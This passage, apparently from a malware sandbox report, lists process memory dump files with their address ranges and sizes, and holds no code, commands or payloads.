                            Filesize

                            168KB

                          • memory/3112-84-0x000002572B680000-0x000002572BE26000-memory.dmp

                            Filesize

                            7.6MB

                          • memory/3112-78-0x000002572AAE0000-0x000002572AAE8000-memory.dmp

                            Filesize

                            32KB

                          • memory/3112-155-0x000002572B0F0000-0x000002572B102000-memory.dmp

                            Filesize

                            72KB

                          • memory/3112-156-0x000002572B0E0000-0x000002572B0EA000-memory.dmp

                            Filesize

                            40KB

                          • memory/3232-126-0x000001FF30130000-0x000001FF30138000-memory.dmp

                            Filesize

                            32KB